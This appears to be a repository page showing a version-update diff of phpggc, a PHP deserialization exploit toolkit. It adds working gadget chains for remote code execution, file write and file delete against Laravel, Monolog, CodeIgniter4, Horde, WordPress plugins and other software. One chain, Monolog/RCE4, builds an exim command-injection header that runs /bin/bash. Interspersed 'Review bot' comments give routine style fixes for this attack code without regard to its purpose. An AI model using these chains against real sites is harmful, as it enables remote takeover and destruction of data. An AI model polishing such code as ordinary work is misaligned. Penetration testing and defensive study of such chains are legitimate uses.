Codebase list phpggc / a334346
New upstream version 0.20210218 Arnaud Rebillout 3 years ago
104 changed file(s) with 2075 addition(s) and 148 deletion(s). Raw diff Collapse all Expand all
0 FROM php:7.4-cli-alpine AS builder
1
2 COPY . /phpggc
3
4 WORKDIR /phpggc
5
6 RUN chmod +x phpggc && echo "phar.readonly=0" > $PHP_INI_DIR/php.ini
7
8 ENTRYPOINT ["/phpggc/phpggc"]
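Review bot: The `echo "phar.readonly=0" > $PHP_INI_DIR/php.ini` on line 6 truncates php.ini instead of adding one directive to it, so any other setting a derived image places there is lost. The official php images provide `$PHP_INI_DIR/conf.d`, so a drop-in such as `echo "phar.readonly=0" > "$PHP_INI_DIR/conf.d/phar.ini"` keeps the override isolated and lets other ini files coexist; quoting the variable also guards against an unexpected path. The `AS builder` alias on line 0 is unused, since the file has a single stage.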
11
22 *PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically*.
33 When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of [frohoff's ysoserial](https://github.com/frohoff/ysoserial), but for PHP.
4 Currently, the tool supports: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.
4 Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.
55
66
77 ## Requirements
88
99 PHP >= 5.6 is required to run PHPGGC.
10 PHP 8 is not yet supported.
1011
1112
1213 ## Usage
1920 Gadget Chains
2021 -------------
2122
22 NAME VERSION TYPE VECTOR I
23 CodeIgniter4/RCE1 4.0.0-beta.1 <= ? rce __destruct
24 Doctrine/FW1 ? file_write __toString *
25 Drupal7/FD1 7.0 < ? file_delete __destruct *
26 Drupal7/RCE1 7.0.8 < ? rce __destruct *
27 Guzzle/FW1 6.0.0 <= 6.3.3+ file_write __destruct
28 Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct *
29 Guzzle/RCE1 6.0.0 <= 6.3.2 rce __destruct *
30 Laravel/RCE1 5.4.27 rce __destruct
31 Laravel/RCE2 5.5.39 rce __destruct
32 Laravel/RCE3 5.5.39 rce __destruct *
33 Laravel/RCE4 5.5.39 rce __destruct
34 Laravel/RCE5 5.8.30 rce __destruct *
35 Laravel/RCE6 5.5.* rce __destruct *
36 Magento/FW1 ? <= 1.9.4.0 file_write __destruct *
37 Magento/SQLI1 ? <= 1.9.4.0 sql_injection __destruct
38 Monolog/RCE1 1.18 <= 1.23 rce __destruct
39 Monolog/RCE2 1.5 <= 1.17 rce __destruct
40 Phalcon/RCE1 <= 1.2.2 rce __wakeup *
41 Pydio/Guzzle/RCE1 < 8.2.2 rce __toString
42 Slim/RCE1 3.8.1 rce __toString
43 SwiftMailer/FD1 -5.4.12+, -6.2.1+ file_delete __destruct
44 SwiftMailer/FW1 5.1.0 <= 5.4.8 file_write __toString
45 SwiftMailer/FW2 6.0.0 <= 6.0.1 file_write __toString
46 SwiftMailer/FW3 5.0.1 file_write __toString
47 SwiftMailer/FW4 4.0.0 <= ? file_write __destruct
48 Symfony/FW1 2.5.2 file_write DebugImport *
49 Symfony/FW2 3.4 file_write __destruct
50 Symfony/RCE1 3.3 rce __destruct *
51 Symfony/RCE2 2.3.42 < 2.6 rce __destruct *
52 Symfony/RCE3 2.6 <= 2.8.32 rce __destruct *
53 Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 rce __destruct *
54 ThinkPHP/RCE1 5.1.x-5.2.x rce __destruct *
55 WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ rce __toString *
56 WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ rce __destruct *
57 WordPress/P/WooCommerce/RCE1 3.4.0 <= 3.6.2+ rce __destruct *
58 WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 rce __destruct *
59 Yii/RCE1 1.1.20 rce __wakeup *
60 ZendFramework/FD1 ? <= 1.12.20 file_delete __destruct
61 ZendFramework/RCE1 ? <= 1.12.20 rce __destruct *
62 ZendFramework/RCE2 1.11.12 <= 1.12.20 rce __toString *
63 ZendFramework/RCE3 2.0.1 <= ? rce __destruct
23 NAME VERSION TYPE VECTOR I
24 CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct
25 CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct
26 Doctrine/FW1 ? File write __toString *
27 Drupal7/FD1 7.0 < ? File delete __destruct *
28 Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct *
29 Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct
30 Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct *
31 Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct *
32 Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct *
33 Laminas/FD1 <= 2.11.2 File delete __destruct
34 Laravel/RCE1 5.4.27 RCE (Function call) __destruct
35 Laravel/RCE2 5.5.39 RCE (Function call) __destruct
36 Laravel/RCE3 5.5.39 RCE (Function call) __destruct *
37 Laravel/RCE4 5.5.39 RCE (Function call) __destruct
38 Laravel/RCE5 5.8.30 RCE (PHP code) __destruct *
39 Laravel/RCE6 5.5.* RCE (PHP code) __destruct *
40 Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *
41 Magento/FW1 ? <= 1.9.4.0 File write __destruct *
42 Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct
43 Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct
44 Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct
45 Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct
46 Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct *
47 Phalcon/RCE1 <= 1.2.2 RCE __wakeup *
48 PHPCSFixer/FD1 <= 2.17.3 File delete __destruct
49 PHPCSFixer/FD2 <= 2.17.3 File delete __destruct
50 PHPExcel/FD1 1.8.2+ File delete __destruct
51 PHPExcel/FD2 <= 1.8.1 File delete __destruct
52 PHPExcel/FD3 1.8.2+ File delete __destruct
53 PHPExcel/FD4 <= 1.8.1 File delete __destruct
54 Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString
55 Slim/RCE1 3.8.1 RCE (Function call) __toString
56 Smarty/FD1 ? File delete __destruct
57 Smarty/SSRF1 ? SSRF __destruct *
58 SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct
59 SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString
60 SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString
61 SwiftMailer/FW3 5.0.1 File write __toString
62 SwiftMailer/FW4 4.0.0 <= ? File write __destruct
63 Symfony/FW1 2.5.2 File write DebugImport *
64 Symfony/FW2 3.4 File write __destruct
65 Symfony/RCE1 3.3 RCE (Command) __destruct *
66 Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct *
67 Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct *
68 Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct *
69 TCPDF/FD1 <= 6.3.5 File delete __destruct *
70 ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct *
71 WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct *
72 WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct *
73 WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString *
74 WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct *
75 WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct *
76 WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct *
77 WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct *
78 WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct *
79 WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct *
80 WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString *
81 WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString *
82 WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct *
83 WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct *
84 WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct *
85 WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct *
86 Yii/RCE1 1.1.20 RCE (Function call) __wakeup *
87 Yii2/RCE1 <2.0.38 RCE (Function call) __destruct *
88 Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct *
89 ZendFramework/FD1 ? <= 1.12.20 File delete __destruct
90 ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct *
91 ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString *
92 ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct
93 ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct *
94
95 ```
96
97 Filter gadget chains:
98
99 ```
100 $ ./phpggc -l laravel
101
102 Gadget Chains
103 -------------
104
105 NAME VERSION TYPE VECTOR I
106 Laravel/RCE1 5.4.27 RCE (Function call) __destruct
107 Laravel/RCE2 5.5.39 RCE (Function call) __destruct
108 Laravel/RCE3 5.5.39 RCE (Function call) __destruct *
109 Laravel/RCE4 5.5.39 RCE (Function call) __destruct
110 Laravel/RCE5 5.8.30 RCE (PHP code) __destruct *
111 Laravel/RCE6 5.5.* RCE (PHP code) __destruct *
112 Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *
64113
65114 ```
66115
139188 a:1:{s:7:"message";O:18:"Slim\Http\Response":2:{...}}
140189 ```
141190
191
142192 ## PHAR(GGC)
143193
144194 ### History
254304 For instance, use `./phpggc -n Drupal RCE` would create a new Drupal RCE gadgetchain.
255305
256306
307
308 ## Docker
309
310 If you don't want to install PHP, you can use `docker build`.
311
312
257313 # License
258314
259315 [Apache License 2.0](LICENSE)
11
22 namespace GadgetChain\CodeIgniter4;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '4.0.0-beta.1 <= ?';
6 public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4';
77 public static $vector = '__destruct';
88 public static $author = 'eboda';
99
1414
1515 return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
1616 }
17 }
17 }
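Review bot: The new `$version` `'4.0.0-beta.1 <= 4.0.0-rc.4'` on line 6 overlaps with CodeIgniter4/RCE2's `'4.0.0-rc.4 <= 4.0.4+'` at 4.0.0-rc.4, so the chain listing cannot tell a reader which of the two applies to that release. If both really work on rc.4, a sentence in `$information` saying so would help; otherwise one of the bounds should be exclusive, e.g. `'4.0.0-beta.1 < 4.0.0-rc.4'`.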
00 <?php
1
12 namespace CodeIgniter\Cache\Handlers {
23 class RedisHandler {
34 protected $redis;
6667 class BaseBuilder {
6768 }
6869 }
69
70
0 <?php
1
2 namespace GadgetChain\CodeIgniter4;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '4.0.0-rc.4 <= 4.0.4+'; // tested on 4.0.0-rc.4, 4.0.3 & 4.0.4
7 public static $vector = '__destruct';
8 public static $author = 'eboda';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14
15 return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
16 }
17 }
0 <?php
1
2 namespace CodeIgniter\Cache\Handlers {
3 class RedisHandler {
4 protected $redis;
5
6 public function __construct($func, $param) {
7 $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler(
8 new \CodeIgniter\Model(
9 new \CodeIgniter\Database\BaseBuilder(
10 new \CodeIgniter\Database\MySQLi\Connection
11 ),
12 new \CodeIgniter\Validation\Validation,
13 $func,
14 new \CodeIgniter\Database\MySQLi\Connection
15 ),
16 array("x" => $param)
17 );
18 }
19 }
20 }
21
22 namespace CodeIgniter\Session\Handlers {
23 class MemcachedHandler {
24 protected $memcached;
25 protected $lockKey;
26
27 public function __construct($memcached, $param) {
28 $this->lockKey = $param;
29 $this->memcached = $memcached;
30 }
31 }
32 }
33
34 namespace CodeIgniter {
35 class Model {
36 protected $builder;
37 protected $primaryKey;
38 protected $beforeDelete;
39 protected $validationRules;
40 protected $validation;
41 protected $tempAllowCallbacks;
42
43 public function __construct($builder, $validation, $func, $db) {
44 $this->builder = $builder;
45 $this->primaryKey = null;
46
47 $this->beforeDelete = array();
48 $this->beforeDelete[] = "validate";
49
50 $this->tempAllowCallbacks = 1;
51 $this->db = $db;
52
53 $this->cleanValidationRules = false;
54 $this->validation = $validation;
55 $this->validationRules = array(
56 "id.x" => array(
57 "rules" => array($func, "dd") // function "dd" exits the script.
58 )
59 );
60 }
61 }
62 }
63
64 namespace CodeIgniter\Validation {
65 class Validation {
66 protected $ruleSetFiles;
67
68 public function __construct() {
69 $this->ruleSetFiles = array("finfo");
70 }
71 }
72 }
73
74 namespace CodeIgniter\Database {
75 class BaseBuilder {
76 public function __construct($db) {
77 $this->QBFrom = array("()");
78 $this->db = $db;
79 }
80 }
81 }
82
83 namespace CodeIgniter\Database\MySQLi {
84 class Connection {
85 }
86 }
87
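Review bot: `Model::__construct` writes `$this->db` and `$this->cleanValidationRules` (lines 51 and 53) and `BaseBuilder::__construct` writes `$this->QBFrom` and `$this->db` (lines 77–78) without declaring those properties, while the neighbouring properties in the same classes are declared `protected`. Dynamic properties serialize under their unprefixed public name, so whether they land on the upstream property depends on its declared visibility there — worth verifying — and they are deprecated from PHP 8.2; declaring them (`protected $db;`, `protected $cleanValidationRules;`, `protected $QBFrom;`) makes the intended visibility explicit. The same pattern appears in Laminas/FD1 gadgets.php (`cleanup`, `streamName`), PHPCSFixer/FD1 (`files`), PHPCSFixer/FD2 (`temporaryFile`, `fileRemoval`), Smarty/FD1 (`handler`, `cache`) and Smarty/SSRF1 (`handler`).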
1515 public static $version = '?';
1616 public static $vector = '__toString';
1717 public static $author = 'cf';
18 public static $informations = '
18 public static $information = '
1919 We do not have full control of the path. If you enter
2020 /var/www/toto/shell.php as the remote_path, it will be converted to
2121 /var/www/toto/e3/5b737464436c61737324434c4153534d455441444154415d5b315d.php.
66 public static $version = '7.0 < ?';
77 public static $vector = '__destruct';
88 public static $author = 'rreiss';
9 public static $informations = '
9 public static $information = '
1010 Note that some files may not be removed (depends on permissions)
1111 ';
1212
11
22 namespace GadgetChain\Drupal7;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '7.0.8 < ?';
77 public static $vector = '__destruct';
88 public static $author = 'Blaklis';
9 public static $informations = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
9 public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
1010
1111 public function generate(array $parameters)
1212 {
66 public static $version = '6.0.0 <= 6.3.2';
77 public static $vector = '__destruct';
88 public static $author = 'erwan_lr';
9 public static $informations = '
9 public static $information = '
1010 This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be
1111 deserialized afterwards.
1212 See https://github.com/ambionics/phpggc/issues/34
11
22 namespace GadgetChain\Guzzle;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '6.0.0 <= 6.3.2';
77 public static $vector = '__destruct';
88 public static $author = 'proclnas';
9 public static $informations = '
9 public static $information = '
1010 This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be
1111 deserialized afterwards.
1212 See https://github.com/ambionics/phpggc/issues/34
0 <?php
1
2 namespace GadgetChain\Horde;
3
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
5 {
6 public static $version = '<= 5.2.22';
7 public static $vector = '__destruct';
8 public static $foundby = 'EgiX';
9 public static $author = 'mr_me';
10 public static $information = '
11 This chain was used against 34 different 0day endpoints targeting Horde v5.2.22. Other versions are probably affected
12 See https://srcincite.io/blog/2020/08/19/a-smorgashorde-of-vulnerabilities-a-comparative-analysis-of-discovery.html
13 ';
14
15 public function generate(array $parameters)
16 {
17 $code = $parameters['code'] . ';die;';
18 return new \Horde_Kolab_Server_Decorator_Clean($code);
19 }
20 }
21 ?>
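Review bot: The file ends with a closing `?>` on line 21, which the other chain files in this commit omit and which turns any byte after it into output when the file is included. Removing line 21 matches the existing chains; the same trailing `?>` appears in Horde/RCE1 gadgets.php, PHPCSFixer/FD1 and FD2 gadgets.php, Smarty/FD1 gadgets.php and Smarty/SSRF1 chain.php.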
0 <?php
1
2 class Horde_Config
3 {
4 protected $_oldConfig;
5 function __construct($code)
6 {
7 $this->_oldConfig = $code;
8 }
9 }
10
11 class Horde_Prefs_Scope implements Serializable
12 {
13 protected $_prefs = array(1);
14 protected $scope;
15 public function serialize()
16 {
17 return json_encode(array(
18 $this->scope,
19 $this->_prefs
20 ));
21 }
22
23 public function unserialize($data)
24 {
25 list($this->scope, $this->_prefs) = json_decode($data, true);
26 }
27 }
28
29 class Horde_Prefs
30 {
31 protected $_opts, $_scopes;
32 function __construct($code)
33 {
34 $this->_opts['sizecallback'] = array(new Horde_Config($code), 'readXMLConfig');
35 $this->_scopes['horde'] = new Horde_Prefs_Scope;
36 }
37 }
38
39 class Horde_Prefs_Identity
40 {
41 protected $_prefs, $_prefnames, $_identities;
42 function __construct($code)
43 {
44 $this->_identities = array(0);
45 $this->_prefs = new Horde_Prefs($code);
46 $this->_prefnames['identities'] = 0;
47 }
48 }
49
50 class Horde_Kolab_Server_Decorator_Clean
51 {
52 private $_server, $_added;
53 function __construct($code)
54 {
55 $this->_added = array(0);
56 $this->_server = new Horde_Prefs_Identity($code);
57 }
58 }
59 ?>
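Review bot: `Horde_Prefs_Scope` on line 11 implements `Serializable` with only `serialize()`/`unserialize()`, which PHP 8.1 reports as deprecated unless `__serialize()`/`__unserialize()` are also present. The README in this commit states PHP 8 is not yet supported, so this is consistent today, but a short comment such as `// mirrors upstream's Serializable implementation; revisit for PHP 8.1+` would record that the legacy interface is used deliberately, presumably to match the upstream class.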
0 <?php
1
2 namespace GadgetChain\Laminas;
3
4 class FD1 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 2.11.2';
7 public static $vector = '__destruct';
8 public static $author = 'MrTuxracer';
9
10 public function generate(array $parameters)
11 {
12 $remote_file = $parameters["remote_file"];
13
14 return new \Laminas\Http\Response\Stream($remote_file);
15 }
16 }
0 <?php
1 namespace Laminas\Http\Response {
2 class Stream {
3 function __construct($remote_file) {
4 $this->cleanup = '1';
5 $this->streamName = $remote_file;
6 }
7 }
8 }
11
22 namespace GadgetChain\Laravel;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.4.27';
77 public static $vector = '__destruct';
11
22 namespace GadgetChain\Laravel;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.5.39';
77 public static $vector = '__destruct';
11
22 namespace GadgetChain\Laravel;
33
4 class RCE3 extends \PHPGGC\GadgetChain\RCE
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.5.39';
77 public static $vector = '__destruct';
88 public static $author = 'BlackFan';
9 public static $informations = 'This chain triggers an ErrorException after code execution.';
9 public static $information = 'This chain triggers an ErrorException after code execution.';
1010
1111 public function generate(array $parameters)
1212 {
11
22 namespace GadgetChain\Laravel;
33
4 class RCE4 extends \PHPGGC\GadgetChain\RCE
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '5.5.39';
77 public static $vector = '__destruct';
11
22 namespace GadgetChain\Laravel;
33
4 class RCE5 extends \PHPGGC\GadgetChain\RCE
4 class RCE5 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '5.8.30';
77 public static $vector = '__destruct';
88 public static $author = 'Phith0n';
9 public static $informations = '
9 public static $information = '
1010 Executes given PHP code through eval().
1111 Requires Mockery, which is in the require-dev package.
1212 ';
13 public static $parameters = [
14 'code'
15 ];
1613
1714 public function generate(array $parameters)
1815 {
11
22 namespace GadgetChain\Laravel;
33
4 class RCE6 extends \PHPGGC\GadgetChain\RCE
4 class RCE6 extends \PHPGGC\GadgetChain\RCE\PHPCode
55 {
66 public static $version = '5.5.*';
77 public static $vector = '__destruct';
88 public static $author = 'Phith0n & holyvier';
9 public static $informations = '
9 public static $information = '
1010 Executes given PHP code through eval().
1111 Requires Mockery, which is in the require-dev package.
1212 ';
0 <?php
1
2 namespace GadgetChain\Laravel;
3
4 class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '? <= 8.16.1'; // will test for more version at a later date
7 public static $vector = '__destruct';
8 public static $author = 'whira';
9 public static $information = 'This chain throws a RuntimeException immediately after code execution.';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \Illuminate\Broadcasting\PendingBroadcast(
17 $function,
18 $parameter
19 );
20 }
21 }
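Review bot: The trailing comment on line 6, `// will test for more version at a later date`, reads as a TODO and has a grammar slip, so it is easy to lose next to the version string. A `// TODO: lower bound not yet tested` states what is actually known and is what a later maintainer will search for.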
0 <?php
1
2 namespace Illuminate\Broadcasting
3 {
4 class PendingBroadcast
5 {
6 protected $events;
7 protected $event;
8
9 public function __construct($function, $parameter)
10 {
11 $this->events = new \Illuminate\Bus\Dispatcher($function);
12 $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter);
13 }
14 }
15 }
16
17 namespace Illuminate\Bus
18 {
19 class Dispatcher
20 {
21 protected $queueResolver;
22
23 public function __construct($function)
24 {
25 $this->queueResolver = $function;
26
27 }
28 }
29 }
30
31 namespace Illuminate\Queue
32 {
33 class CallQueuedClosure
34 {
35 protected $connection;
36
37 public function __construct($parameter)
38 {
39 $this->connection = $parameter;
40 }
41 }
42 }
43
44
66 public static $version = '? <= 1.9.4.0';
77 public static $vector = '__destruct';
88 public static $author = 'eboda';
9 public static $informations = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.';
9 public static $information = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.';
1010
1111 public function generate(array $parameters)
1212 {
11
22 namespace GadgetChain\Monolog;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '1.18 <= 1.23';
6 public static $version = '1.18 <= 2.1.1+';
77 public static $vector = '__destruct';
88 public static $author = 'cf';
99
1919 )
2020 );
2121 }
22 }
22 }
11
22 namespace GadgetChain\Monolog;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
6 public static $version = '1.5 <= 1.17';
6 public static $version = '1.5 <= 2.1.1+';
77 public static $vector = '__destruct';
88 public static $author = 'cf';
99
0 <?php
1
2 namespace GadgetChain\Monolog;
3
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.1.0 <= 1.10.0';
7 public static $vector = '__destruct';
8 public static $author = 'theBumble';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14
15 return new \Monolog\Handler\BufferHandler(
16 ['current', $function],
17 [$parameter, 'level' => null]
18 );
19 }
20 }
0 <?php
1
2 namespace Monolog\Handler
3 {
4 class NativeMailerHandler {
5 protected $to = null;
6 protected $subject = null;
7 protected $headers = null;
8
9 protected $level = null;
10 protected $bubble = false;
11 protected $formatter = null;
12 protected $processors;
13
14 function __construct($methods) {
15 $this->processors = $methods;
16
17 }
18 }
19
20 class BufferHandler
21 {
22 protected $handler;
23 protected $bufferSize = -1;
24 protected $buffer;
25
26 # ($record['level'] < $this->level) == false
27 protected $level = null;
28 protected $bubble = false;
29 protected $formatter = null;
30 protected $processors;
31
32 function __construct($methods, $command)
33 {
34 $this->processors = null;
35 $this->buffer = [$command];
36 $this->handler = new NativeMailerHandler($methods);
37 }
38 }
39 }
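Review bot: `BufferHandler::__construct($methods, $command)` on line 32 names its second argument `$command`, but the chain passes the record array `[$parameter, 'level' => null]` and the value is stored as the single element of `$this->buffer`, so `$record` would describe it accurately. `NativeMailerHandler::__construct` on lines 14–17 also carries a stray blank line before its closing brace, and the `#` comment on line 26 could use `//` to match the other gadget files.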
0 <?php
1
2 namespace GadgetChain\Monolog;
3
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\Command
5 {
6 public static $version = '? <= 2.4.4+';
7 public static $vector = '__destruct';
8 public static $author = 'whira';
9 public static $information = '
10 This chain will target debian based distribution (exim4 MTA) as it will perform a command injection on mail()
11 and use exim4 extended strings, the payload is `/bin/bash -c "$command"`.
12 As this GC requires a setup that is specific, you should have better results by running Monolog/RCE1 or
13 Monolog/RCE2 instead.
14 ';
15
16 public function generate(array $parameters)
17 {
18 $command = $parameters['command'];
19
20 return new \Monolog\Handler\RollbarHandler(
21 new \Monolog\Handler\BufferHandler(
22 new \Monolog\Handler\NativeMailerHandler($command)
23 )
24 );
25 }
26 }
0 <?php
1
2 namespace Monolog\Handler
3 {
4 class RollbarHandler
5 {
6 private $hasRecords;
7 protected $rollbarLogger;
8
9 public function __construct($buffer)
10 {
11 $this->hasRecords = true;
12 $this->rollbarLogger = $buffer;
13 }
14 }
15
16 class BufferHandler
17 {
18 protected $bufferSize;
19 protected $handler;
20 protected $buffer;
21
22 public function __construct($buffer)
23 {
24 $this->bufferSize = 2;
25 $this->handler = $buffer;
26 $this->buffer = [0 => array("level" => 100,
27 "message" => 1,
28 "context" => [],
29 "extra" => [],
30 "channel" => 1)];
31 }
32 }
33
34 class NativeMailerHandler
35 {
36 protected $level;
37 protected $processors;
38 protected $formatter;
39 protected $maxColumnWidth;
40 protected $parameters;
41 protected $to;
42 protected $headers;
43
44 public function __construct($command)
45 {
46 $this->level = 1;
47 $this->processors = ["array_reverse"];
48 // if $this->buffer[0] is carefully crafted
49 // $this->format can be used to pass a payload through the 'body' parameter
50 // via the LineFormatter
51 // Here we used the headers param to pass the payload
52 $this->formatter = new \Monolog\Formatter\LineFormatter();
53 $this->maxColumnWidth = 20;
54 $this->parameters = ["-be"];
55 $this->headers = ['${run{/bin/bash -c "'.$command.'"}{yes}{no}}'];
56 $this->to = ["init@localhost"];
57 }
58 }
59 }
60
61 namespace Monolog\Formatter
62 {
63 class LineFormatter
64 {
65 protected $format;
66 public function __construct()
67 {
68 $this->format = "";
69 }
70 }
71 }
72
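Review bot: This file redeclares `Monolog\Handler\BufferHandler` and `NativeMailerHandler` with a different property set than Monolog/RCE3's gadgets.php, so the two gadget files cannot be loaded into one process; that is presumably fine if phpggc includes one chain per run, but a one-line comment at the top saying so would save the next reader the check. Within `NativeMailerHandler::__construct`, lines 47 and 54 use `[]` while `BufferHandler::__construct` on line 26 uses `array(...)`; picking one form keeps the file consistent.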
0 <?php
1 namespace GadgetChain\PHPCSFixer;
2
3 class FD1 extends \PHPGGC\GadgetChain\FileDelete
4 {
5 public static $version = '<= 2.17.3';
6 public static $vector = '__destruct';
7 public static $author = 'snoopysecurity';
8
9 public function generate(array $parameters)
10 {
11 $remote_file = $parameters["remote_file"];
12
13 return new \PhpCsFixer\FileRemoval($remote_file);
14 }
15 }
16
0 <?php
1
2 namespace PhpCsFixer
3 {
4 //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php
5 class FileRemoval
6 {
7
8 function __construct($remote_file)
9 {
10 $this->files = [$remote_file => $remote_file];
11
12 }
13
14 }
15 }
16
17 /*
18 public function __destruct()
19 {
20 $this->clean();
21 }
22
23
24
25
26 public function clean()
27 {
28 foreach ($this->files as $file => $value) {
29 $this->unlink($file);
30 }
31 $this->files = [];
32 }
33
34 private function unlink($path)
35 {
36 @unlink($path);
37 }
38 }
39 */
40
41
42 ?>
0 <?php
1
2 namespace GadgetChain\PHPCSFixer;
3
4 class FD2 extends \PHPGGC\GadgetChain\FileDelete
5 {
6 public static $version = '<= 2.17.3';
7 public static $vector = '__destruct';
8 public static $author = 'snoopysecurity';
9
10 public function generate(array $parameters)
11 {
12 $remote_file = $parameters["remote_file"];
13
14 return new \PhpCsFixer\Linter\ProcessLinter($remote_file);
15 }
16 }
0 <?php
1 namespace PhpCsFixer\Linter
2 {
